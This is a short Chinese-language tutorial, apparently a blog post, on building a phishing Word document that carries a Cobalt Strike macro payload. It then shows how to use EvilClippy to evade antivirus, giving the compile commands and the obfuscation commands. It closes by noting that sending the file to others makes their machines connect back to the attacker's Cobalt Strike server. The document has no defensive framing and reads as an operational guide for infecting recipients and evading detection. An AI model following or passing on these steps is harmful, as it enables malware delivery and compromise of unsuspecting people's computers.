Cobalt-Strike Office宏利用与免杀

1.打开Cobalt-Strike生产Office宏病毒。

首先需要设置监听器、因为钓鱼的目标比较单纯，在这里就不采用域前置技术。

然后使用攻击模块，生产Office宏病毒。

设置好监听器。

生成宏病毒

2.将宏病毒放入word

首先打开Word，在审阅中编辑宏：

创建新的宏：

将生成的宏病毒放入Microsoft Word目录下的ThisDocument，注意如果宏位置写错了很容易报错。

按下Ctrl+S，将文件保存为启用宏的Word文档，注意这里的作者需要修改，否则默认会使用账户名

此时带宏病毒的Word文件已经生成，但是会发现过不了杀软，需要进行免杀。

 

此时需要一款比较知名的免杀软件：EvilClippy

最新版本的：https://github.com/outflanknl/EvilClippy/releases/tag/v1.3

软件需要编译运行，由于本人使用的是Linux环境进行免杀，所以命令如下：

首先需要有mono环境：

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF

echo "deb http://download.mono-project.com/repo/debian wheezy main" | sudo tee /etc/apt/sources.list.d/mono-xamarin.list

sudo apt-get update

sudo apt-get install mono-completesudo 

apt-get install monodevelop

然后使用mono,进行编译：

mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

检查免杀软件是否可以正常运行：

mono EvilClippy.exe -h

然后进行免杀操作：

首先需要创建一个vba文件，后续需要进行混淆，vba内容如下

Sub Hello()

Dim X

X=MsgBox("Hello VBS")

#先使用一个模块来设置随机模块名，混淆了一些分析工具，会生成一个以_EvilClippy.docm结尾的文件。

mono EvilClippy.exe -r Doc1.docm

#其次使用之前设置的vba文件对生成文件进行伪装混淆，命令如下

mono EvilClippy.exe -s 3.vba Doc1_EvilClippy.docm

生成文件，放入沙箱进行查杀，效果如下:

过了国内大部分杀软。

因此将文件发给别人就可以观察到Cobalt-Strike有上线 主机了。